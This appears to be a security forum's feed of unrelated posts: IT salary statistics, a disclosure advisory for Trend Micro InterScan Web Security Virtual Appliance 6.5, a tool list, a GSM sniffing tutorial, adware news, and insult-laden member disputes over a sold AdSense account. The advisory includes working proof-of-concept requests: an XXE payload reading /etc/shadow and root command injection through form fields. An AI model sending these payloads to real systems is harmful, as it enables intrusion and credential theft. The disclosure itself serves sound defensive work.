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Cât câştigă un programator şi cum ne raportăm la salariile programatorilor din alte țări? Marti, 23 Mai 2017 7594 vizualizari Sursa foto Potrivit datelor despre salarii provenite din contribuțiile utilizatorilor Undelucram.ro, postate în ultimii 4 ani, am identificat un salariu minim net care pornește de la 1.000 RON (o pozitie entry level, aferentă unei experiențe reduse), şi care ajunge până la un maxim de 16.000 RON. Excluzând extremele, puține la număr, utilizatorii noștri, care au împărtășit comunității date despre venitul lor salarial, câştigă în medie 4.418 RON sau aprox. 1000 EUR. Sursa: Undelucram.ro Cum arată aceasta medie în raport cu datele colectate de institutul de statistică? Ultima valoare înregistrată, aferentă lunii martie 2017, arată o medie a caştigului unui angajat in “Activitati de servicii în tehnologia informatiei; Activitati de servicii informatice”, egală cu 5.880 RON (aprox. 1.292 EUR). Facem totuși precizarea că datele colectate de INS se referă la un domeniu de activitate mai larg, în consecință putem avea incluse în medie şi salarii care nu au legătură directă cu activitatea de programare. În 2016, salariile angajaților din IT au crescut cu 22% față de anul precedent, în timp ce în primele 3 luni ale lui 2017 se înregistrează o creștere de 9% an vs. an. Cum ne raportam la salariile țărilor din regiune, Europa de Vest, dar si America de Nord? Sursa: Undelucram.ro, INS, Eurostat, Institute de Statistica Nationale – Europa de Vest si America de Nord Așa cum am precizat, datele provenite de la unele instituții de statistică naționale nu oferă valori exclusive activității de programare. În schimb se realizeaza o medie, pe baza tuturor salariilor din domeniul IT. În graficul de mai sus, avem această situație pentru datele oferite de INS, dar si pentru cele oferite de instituțiile de statistica din unele țări ale Europei Centrale. Per ansamblu, valorile în regiune sunt destul de apropiate, mai mult chiar, România se află în fața Europei Centrale pe aceasta medie agregata din sectorul IT: 1.251 EUR vs. 1.154 EUR in regiune. Situația se schimbă radical în comparație cu țări considerate dezvoltate, iar aici valorile sunt direct comparabile cu datele de pe Undelucram, pentru că se refera strict la activitățile de programare. Un programator din Europa de Vest câstigă în medie 3.155 EUR, iar unul din America de Nord 4.547 EUR, de aproximativ 3, respectiv 4 ori mai mult decât salariul din România. Cum arată datele în contextul unei comparații cu Indicele Cheltuielilor de zi cu zi, aferent locațiilor geografice respective? Sursa: Numbeo.com În Europa Centrală, indicele cheltuielilor curente este doar cu aprox. 15% mai mare decat in România. În schimb, în țările din Europa de Vest, precum si peste ocean, costul vieții este mai mult sau mai puțin DUBLU. Cum arată salariul programatorilor, ajustat la puterea de cumpărare aferentă regiunilor comparate? Sursa: Calcule Undelucram.ro, Numbeo.com Chiar si ajustate la puterea de cumpărare, în comparație cu țara noastră, salariile programatorilor sunt cu 60% mai mari in Europa de Vest si mai mult decât duble in America de Nord. Pe lângă salarii, ce alte beneficii mai primesc angajații care lucrează în PROGRAMARE? Asigurare medicala şi Program flexibil, marea majoritate: 61%, respectiv 67% Tichete de masă: mai puțin de jumatate, 42% Al 13-lea salariu şi pensie facultativă: foarte puțini: 30%,respectiv 10%. Spune comunității cât câştigi. Postarea ta este şi va rămâne anonimă. Sursa: https://www.undelucram.ro/stire/cat-castiga-un-programator-si-cum-ne-raportam-la-alte-tari-11053 points
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Want to get paid for a vulnerability similar to this one? Contact us at: ssd@beyondsecurity.com Vulnerabilities Summary The following advisory describes three (3) vulnerabilities found in Trend Micro Interscan Web Security Virtual Appliance version 6.5. The vulnerabilities found in Trend Micro Interscan Web Security Virtual Appliance: XML External Entity (XXE) that lead to arbitrary file disclosure Local Privilege Escalation Remote code execution Credit An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program. Vendor response Trend Micro has released patches to address these vulnerabilities and issued the following advisory: https://success.trendmicro.com/solution/1117412 Vulnerabilities Details XML External Entity (XXE) that lead to arbitrary file disclosure Trend Micro Security Manager uses an outdated REST API (resteasy-jaxrs-2.3.5.Final.jar). The library suffers from an XXE vulnerability that can be exploited using Parameter Entities. Proof of Concept By sending the following POST request, an attacker can gain the victims “/etc/shadow” POST /rest/authentication/login/sso HTTP/1.1 Host: Content-Type: application/xml Content-Length: 360 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE roottag [ <!ENTITY % start "<![CDATA["> <!ENTITY % goodies SYSTEM "file:///etc/shadow"> <!ENTITY % end "]]>"> <!ENTITY % dtd SYSTEM ""> %dtd; ]> <dsCredentials> <password>P@ssw0rd</password> <tenantName></tenantName> <userName>&all;</userName> </dsCredentials> Local Privilege Escalation Admin users have access via the web interface to the SSH configuration settings. The port settings are not properly handled and allow injecting shell commands as the root user. POST /SSHConfig.jsp HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: Cookie: JSESSIONID=2930898FD09512142C1B26C71D24466D Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 150 CSRFGuardToken=67CI42CKYSW7R9JYWXEPN2MN2J9K8E5E&needSSHConfigure=yes&SSHSt atus=enable&SSHPort=22&op=save&cbSSHStatus=enable&btSSHPort=221 In the above code, the SSHPort= parameter does not sanitize the incoming data. An attacker can use this to inject commands that will run as root on the victim’s machine. Proof of Concept The following POST request will call the sleep command with a value of 60 seconds: POST /SSHConfig.jsp HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: Cookie: JSESSIONID=2930898FD09512142C1B26C71D24466D Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 150 CSRFGuardToken=67CI42CKYSW7R9JYWXEPN2MN2J9K8E5E&needSSHConfigure=yes&SSHSt atus=enable&SSHPort=%60sleep%2010%60&op=save&cbSSHStatus=enable&btSSHPort=221 Remote code execution Trend Micro Interscan Web Security Virtual Appliance has a default user with sudo privileges named iscan. This user is locked out but it can access certain elevated functions. POST /servlet/com.trend.iwss.gui.servlet.ManageSRouteSettings?action=add HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: Cookie: JSESSIONID=2930898FD09512142C1B26C71D24466D Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 259 CSRFGuardToken=67CI42CKYSW7R9JYWXEPN2MN2J9K8E5E&op=sroutemanage&fromurl=%2 FstaticRoutes.jsp&failoverurl=%2FstaticRouteEdit.jsp&port=&oldnetid=&oldrouter=&oldnetmask=& oldport=&netid= In the above POST request, we can see the page has several parameters that are vulnerable and that we can inject malicious parameters through them: netid, netmask, router, and interface_vlanid_sel Proof of Concept POST /servlet/com.trend.iwss.gui.servlet.ManageSRouteSettings?action=add HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: Cookie: JSESSIONID=2930898FD09512142C1B26C71D24466D Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 259 CSRFGuardToken=67CI42CKYSW7R9JYWXEPN2MN2J9K8E5E&op=sroutemanage&fromurl=%2 FstaticRoutes.jsp&failoverurl=%2FstaticRouteEdit.jsp&port=&oldnetid=&oldrouter=&oldnetmask=& oldport=&netid= c%2021%20127.0.0.1%60%20%23'%7c%7c%60ping%20- c%2021%20127.0.0.1%60%20%23%5c%22%20&netmask= rface_vlanid_sel=eth1 Source2 points
DLC Boot 2016 is a rescue disk that is used as a Recovery CD. The point is that if you are having problems such as Windows can not boot, missing MBR, want to format the hard drive, remove viruses and so on, you can simply use the DLC Boot 2016 to resolve these issue. DLC Boot 2016 is also able to backup / restore windows partition, create partitions, entering a locked Windows, and much more! * Integrated Mini Windows 10 32/64 bit * Integrated Mini Windows XP deducted from Hiren's version 15.2 and has been built, optimized again. TOOLS LIST: Download: https://docs.google.com/uc?id=0BxTOYa030FZmcDNvOTNhWFU3c00&export=download1 point
ai dreptate, am gresit ca i-am postat datele persoanele, asa cum si el postase datele mele. am sters datele persoanele.1 point
@Nytro din punctul meu de vedere, eu mi-am facut treaba. contul este aprobat ( inca este aprobat ) pe mine ma deranjat ca a primit contul, apoi a facut magarii ca cica are contul disable si a vrut refund. a vrut sa pastreze contul si sa primeasca si refund. Multumesc. @aismen Multumesc. @dancear Multumesc.1 point
1 point
Faci si tu comparatie stupida. Urmand aceeasi logica, unul in Ro castiga de X ori mai mult decat unul in Zimbabwe. Iar in alta ordine de idei: prietenul tau e e posibil sa fie cam pielea pulii. Daca in Babuinland lua sa zicem un 2000 lunar, x5, inseamna £1900 - pielea pulii. Depinde ce salar avea in tara. Si marea majoritate a pitiponcilor care vin pe aici ii pocneste mandria si manca rahat apoi cand se lauda ca fac si dreg.1 point
Black Hat Arsenal USA 2017 On June 1, 2017 @toolswatch announced the tools selected for Black Hat Arsenal USA 2017. Most of the selected tools are already present on GitHub and some are yet to be uploaded. This article contains the links to their respective repositories. The tools are arranged according to their tracks. If you like the tool, go to its repository and click Watch to keep updated on the latest commits and pushes. Some tools will be updated during/after the Arsenal event. Links to the GitHub repositories of those tools will be eventually updated in this article. Android, iOS and Mobile Hacking Android Tamer https://github.com/AndroidTamer DiffDroid https://github.com/antojoseph/diff-droid Kwetza https://github.com/sensepost/kwetza Needle https://github.com/mwrlabs/needle NoPE Proxy (Non-HTTP Proxy Extension) https://github.com/summitt/Burp-Non-HTTP-Extension Code Assessment Puma Scan https://github.com/pumasecurity/puma-scan Tintorera: Source Code Intelligence (Code not yet uploaded) https://github.com/vulnex/Tintorera Cryptography Hashview https://github.com/hashview/hashview Gibber Sense https://github.com/smxlabs/gibbersense Data Forensics and Incident Response PcapDB: Optimized Full Network Packet Capture for Fast and Efficient Retrieval https://github.com/dirtbags/pcapdb SCOT (Sandia Cyber Omni Tracker) Threat Intelligence and Incident Response Management System https://github.com/sandialabs/scot Security Monkey https://github.com/Netflix/security_monkey ThreatResponse: An Open Source Toolkit for Automating Incident Response in AWS https://github.com/ThreatResponse Yalda — Automated Bulk Intelligence Collection (Code not yet uploaded) https://github.com/gitaziabari/Yalda Exploitation and Ethical Hacking AVET — AntiVirus Evasion Tool https://github.com/govolution/avet GDB Enhanced Features (GEF) https://github.com/hugsy/gef Leviathan Framework https://github.com/leviathan-framework/leviathan MailSniper https://github.com/dafthack/MailSniper Seth https://github.com/SySS-Research/Seth Hardware/Embedded ChipWhisperer https://github.com/newaetech/chipwhisperer DYODE, a DIY, Low-Cost Data Diode for ICS https://github.com/arnaudsoullie/dyode FTW: Framework for Testing WAFs https://github.com/fastly/ftw The Bicho: An Advanced Car Backdoor Maker https://github.com/UnaPibaGeek/CBM Internet of Things Hacker Mode https://github.com/xssninja/Alexa-Hacker-Mode Universal Radio Hacker: Investigate Wireless Protocols Like a Boss https://github.com/jopohl/urh Malware Defense Aktaion v2 — Open Source Machine Learning and Active Defense Tool https://github.com/jzadeh/Aktaion Cuckoo Sandbox https://github.com/cuckoosandbox/cuckoo LimaCharlie https://github.com/refractionPOINT/limacharlie Malboxes https://github.com/GoSecure/malboxes Network Attacks BloodHound 1.3 https://github.com/BloodHoundAD/BloodHound CrackMapExec v4 https://github.com/byt3bl33d3r/CrackMapExec DELTA: SDN Security Evaluation Framework https://github.com/OpenNetworkingFoundation/DELTA eaphammer https://github.com/s0lst1c3/eaphammer gr-lora: An Open-Source SDR Implementation of the LoRa PHY https://github.com/BastilleResearch/gr-lora Yasuo https://github.com/0xsauby/yasuo Network Defense Assimilator https://github.com/videlanicolas/assimilator Noddos https://github.com/noddos/noddos Sweet Security https://github.com/TravisFSmith/SweetSecurity OSINT — Open Source Intelligence Datasploit — Automated Open Source Intelligence (OSINT) Tool https://github.com/DataSploit/datasploit Dradis: 10 Years Helping Security Teams Spend More Time Testing and Less Time Reporting https://github.com/dradis/dradis-ce OSRFramework: Open Sources Research Framework https://github.com/i3visio/osrframework Reverse Engineering BinGrep https://github.com/m4b/bingrep Vulnerability Assessment Aardvark and Repokid https://github.com/square/Aardvark SERPICO https://github.com/SerpicoProject/Serpico SimpleRisk https://github.com/simplerisk/code Web AppSec BurpSmartBuster: A Smart Way to Find Hidden Treasures https://github.com/pathetiq/BurpSmartBuster CSP Auditor https://github.com/GoSecure/csp-auditor Easily Exploit Timing Attacks in Web Applications with the ‘timing_attack’ Gem https://github.com/ffleming/timing_attack Fuzzapi — Fuzzing Your RESTAPIs Since Yesterday https://github.com/lalithr95/fuzzapi Offensive Web Testing Framework (OWASP OWTF) https://github.com/owtf/owtf PyMultiTor https://github.com/realgam3/pymultitor ThreadFix Web Application Attack Surface Calculation https://github.com/denimgroup/threadfix WaToBo — The Web Application Toolbox https://github.com/siberas/watobo WSSiP: A WebSocket Manipulation Proxy https://github.com/nccgroup/wssip If you haven’t looked at the selected tools, check the below embed to view the complete details of the tools and its presenters. The Black Hat Arsenal USA 2017 Phenomenal Line-Up Announced Just a BIG w00w !! Over 90 tools covering hardware/embedded, IoT, Malware defense, exploitations and more ! We had…www.toolswatch.org Sursa: https://medium.com/hack-with-github/black-hat-arsenal-usa-2017-3fb5bd9b5cf21 point
PASSIVE GSM SNIFFING WITH SOFTWARE DEFINED RADIO 02/06/2017 0 Comments in Blog by Rashid Feroze I have been working on Telecom Security and Software defined radio since a few months and I noticed that there are very limited resources on the internet for beginners who want to get into telecom security. Not many people from security industry are into this and very less information has been shared online. I would be sharing here whatever I have gained in past few months in a series of blog posts. Now, before getting into active security analysis of GSM networks, let’s first see what we can do by just passively sniffing the airwaves around us. To sniff RF waves around us, the best way is get your hands on a SDR. WHAT IS A SDR? According to Wikipedia, Software-defined radio (SDR) is a radio communication system where components that have been typically implemented in hardware (e.g. mixers, filters, amplifiers, modulators/demodulators, detectors, etc.) are instead implemented by means of software on a personal computer or embedded system. In simple terms, It refers to a technique in which all the processing is done in software. The processing mentioned include mixing, filtering, demodulation etc. We can use a SDR to capture airwaves when tuned to a particular frequency. The range of frequency it can capture and the bandwidth differs with different SDR devices. Here, we would be using RTL-SDR, the cheapest one available, to sniff over GSM. GSM FREQUENCY BANDS Before getting into details, let’s first have a look on different GSM frequency bands. GSM operates on a set of pre-defined frequencies designated by International Telecommunication union for the operation of GSM mobile phones. GSM frequency bands In India, we use two bands which are shaded in yellow in the above picture. A dual-band 900/1800 phone is required to be compatible with most networks around the world. For sniffing, first we need to identify the GSM downlink channels. Here we would be sniffing GSM data for our own phone so we would need to know upon what frequency it is operating on. We can do this by getting the ARFCN no. from our phone. In GSM cellular networks, an absolute radio-frequency channel number (ARFCN) is a code that specifies a pair of physical radio carriers used for transmission and reception in a land mobile radio system, one for the uplink signal and one for the downlink signal. I am using Motorola G4 and in this phone we can get to the service mode by dialing *#*#4636#*#* on our phone keypad. I have switched the phone to 2G mode as analysis of 2G is much easier than 3G/4G. They are using different encoding and encryption schemes and we can cover them later. Our ARFCN no. is 672. We can calculate exact frequency on which this phone is operating by using the ARFCN number. By using a simple ARFCN calculator we got to know the frequency our phone is operating in. ARFCN Calculator Now. Let’s tune our RTL-SDR to that particular frequency and find out what we can see. Gqrx tool We can clearly see the GSM Stream bits on that frequency. Let’s also scan for all the GSM channels around us. This will give us confirmation about our downlink channel. We can use kalibrate-rtl tool to scan GSM frequencies around us. kalibrate-rtl Here also we can see our downlink channel and it also gives us the offset value which will help us calibrate our SDR better. Whatever data which the SDR is receiving is just raw data which makes no sense. We can use GR-GSM to decode this raw data and process this into meaningful information. grgsm_livemon running Now start wireshark simultaneously and we would start seeing the GSM data packets in the wireshark. We can also filter out Gsmtap packets. This is a system Information type 3 packet. Information needed by the MS for cell selection and reselection is broadcasted with the help of this. Location Update message CAN WE LISTEN TO VOICE CALLS THEN? All the data channels are almost always encrypted using a stream cipher (A5) used to provide over-the-air communication privacy in the GSM cellular telephone standard. We can only see some of the control channels above which were not encrypted. All the calls and messages are encrypted using an encryption key (Kc) which is generated after an authentication mechanism by Authentication Center (AUC) which follows a challenge-response authentication model. The SIM card stores an encryption key called as Ki which is also stored by AUC/HLR. The Ki or Kc is never exchanged over network, therefore making it impossible to sniff encryption keys over the air. Moreover, the Kc changes before each call is setup. It means for every call, there would be a different encryption key. However, older version of A5 can be cracked if we have enough computation power. Researches have cracked A5/1 encryption by setting up the entire process in cloud which has huge computation power. Kraken is the tool that can be used for this. We cannot capture voice data with RTL-SDR because during a call, channel hopping takes place and the bandwidth of the RTL-SDR is not enough to capture the whole range at a time. We would need a better SDR with more bandwidth like a HackRF or any SDR device above that. HOW DOES INTELLIGENCE AGENCIES INTERCEPT OUR CALLS THEN? 1. DOWNGRADING THE ENCRYPTION ALGORITHM USED Even if the operator is using new and strong encryption algorithm, sometimes It is possible to force the operator to switch to a weaker encryption algorithm. Operators have to enable support for older encryption algorithms because many older phones doesn’t have enough computation power to use new encryption algorithms. 2. SOME OF THE OPERATORS DOESN’T USE ANY ENCRYPTION AT ALL During telecom security vulnerability assessments, it was found that, sometimes operators turn off encryption schemes completely when the load on the network increases so that they can reduce overhead traffic and can accommodate more users easily. 3. MITM ATTACK This is the most common attack vector that have been used since years by different hacker groups and Intelligence agencies. One can create fake cell towers and fool a mobile station in the vicinity to connect to that fake cell tower. All the mobile station data now would be going through that fake cell tower and the person in control could force the MS to use no encryption at all. 4. GETTING THE SIM CARD ENCRYPTION KEYS In 2015, It was in the news that some spies hacked into the internal computer network of the largest manufacturer of SIM cards in the world, stealing encryption keys (Ki) used to protect the privacy of cellphone communications across the globe. This key could be used to decrypt the GSM data. WHAT NEXT? We will talk more about security analysis of GSM networks using Osmocom-BB, we will setup our own GSM Network using OpenBTS and discuss about the attacks possible over Um and Abis interfaces in the upcoming blogposts related to telecom security. Stay Tuned. Sursa: http://payatu.com/passive-gsm-sniffing-software-defined-radio/1 point
1 point
Security researchers have discovered a massive malware campaign that has already infected more than 250 million computers across the world, including Windows and Mac OS. Dubbed Fireball, the malware is an adware package that takes complete control of victim's web browsers and turns them into zombies, potentially allowing attackers to spy on victim's web traffic and potentially steal their data. Check Point researchers, who discovered this massive malware campaign, linked the operation to Rafotech, a Chinese company which claims to offer digital marketing and game apps to 300 million customers. While the company is currently using Fireball for generating revenue by injecting advertisements onto the browsers, the malware can be quickly turned into a massive destroyer to cause a significant cyber security incident worldwide. Fireball comes bundled with other free software programs that you download off of the Internet. Once installed, the malware installs browser plugins to manipulate the victim's web browser configurations to replace their default search engines and home pages with fake search engines (trotux.com). The fake search engine simply redirects the victim's queries to either Yahoo.com or Google.com and includes tracking pixels that collect the victim's information. Far from legitimate purpose, Fireball has the ability to spy on victim's web traffic, execute any malicious code on the infected computers, install plug-ins, and even perform efficient malware dropping, which creates a massive security hole in targeted systems and networks. At the current, Fireball adware is hijacking users' web traffic to boost its advertisements and gain revenue, but at the same time, the adware has the capability to distribute additional malware. "Based on our estimated infection rate, in such a scenario, one out of five corporations worldwide will be susceptible to a major breach," researchers added. According to researchers, over 250 million computers are infected worldwide, 20 percent of them are corporate networks: 25.3 million infections in India (10.1%) 24.1 million in Brazil (9.6%) 16.1 million in Mexico (6.4%) 13.1 million in Indonesia (5.2%) 5.5 million In US (2.2%) Warning Signs that Your Computer is Fireball-Infected If the answer to any of the following questions is "NO," that means your computer is infected with Fireball or a similar adware. Open your web browser and check: Did you set your homepage? Are you able to modify your browser's homepage? Are you familiar with your default search engine and can modify that as well? Do you remember installing all of your browser extensions? To remove the adware, just uninstall the respective application from your computer (or use an adware cleaner software) and then restore/reset your browser configurations to default settings. The primary way to prevent such infections is to be very careful when you agree to install. You should always pay attention when installing software, as software installers usually include optional installs. Opt for custom installation and then de-select anythingia th that is unnecessary or unfamiliar. Via thehackernews.com1 point
am dovezi ca minte ca un cacat de om ce este !!! @aelius @Nytro sau alt moderator revin in 2 ore maxim cu dovezi clare cum am zis revin cu dovezi!!! suma de 250 euro pentru un cont de adsense https://www.youtube.com/watch?v=S1oqHnpI8bM http://www.imenuprices.com/wendys-prices/ ghici, are reclama adsense ! view-source:http://www.imenuprices.com/wendys-prices/ si dam search dupa pub-1717700050408150 te-am prins. nu te uit. ce ziceti de el? a vrut refund si contul.0 points